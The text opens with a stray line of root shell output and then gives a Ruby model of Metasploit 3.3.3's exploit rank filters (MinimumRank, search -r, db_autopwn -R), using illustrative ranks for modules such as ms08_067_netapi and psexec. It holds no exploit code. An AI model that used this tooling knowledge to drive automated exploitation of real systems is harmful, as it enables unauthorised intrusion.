uid=0(root) gid=0(wheel) groups=0(wheel)
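The three rank filters described above (search -r, the MinimumRank gate with its -f override, and the -R matching used by db_autopwn and nexpose_scan) modelled in Ruby as an added example; this is not Metasploit's own code, the rank names are the seven levels the post lists, and the per-module ranks in the sample table are constructed for illustration rather than read from real module metadata.

```ruby
# Added example, not Metasploit's code: a minimal model of the 3.3.3 rank filters.
# Rank order is the list from the post, lowest first.
RANKS = %w[manual low average normal good great excellent].freeze

# Numeric position of a rank name. Raises on an unknown name so a typo in
# `setg MinimumRank` cannot silently disable the filter.
def rank_value(name)
  idx = RANKS.index(name.to_s.downcase)
  raise ArgumentError, "unknown rank '#{name}'" if idx.nil?
  idx
end

# search -r / db_autopwn -R / nexpose_scan -R: keep only modules whose rank is
# the minimum or better. `modules` is a Hash of module name => rank name.
def filter_by_min_rank(modules, min_rank)
  min = rank_value(min_rank)
  modules.select { |_name, rank| rank_value(rank) >= min }
end

# The MinimumRank gate applied when `exploit` is run: returns :run when the
# module meets the global minimum or the user passed `exploit -f`, otherwise
# the refusal text the console prints.
def check_minimum_rank(module_rank, minimum_rank, force: false)
  return :run if force || rank_value(module_rank) >= rank_value(minimum_rank)
  "This exploit is below the minimum rank, '#{minimum_rank}'."
end

# Constructed sample (ranks chosen for illustration): modules db_autopwn matched
# in the post, assigned so that only psexec and qtss_parse_xml_exec survive
# `-R excellent`, matching the output shown above.
SAMPLE_MODULES = {
  "exploit/unix/webapp/qtss_parse_xml_exec" => "excellent",
  "exploit/windows/smb/psexec"              => "excellent",
  "exploit/windows/smb/ms08_067_netapi"     => "great",
  "exploit/osx/samba/lsa_transnames_heap"   => "average",
  "exploit/windows/dcerpc/ms03_026_dcom"    => "great",
}.freeze

if __FILE__ == $PROGRAM_NAME
  puts filter_by_min_rank(SAMPLE_MODULES, "excellent").keys
  puts check_minimum_rank("great", "excellent")
  puts check_minimum_rank("great", "excellent", force: true)
end
```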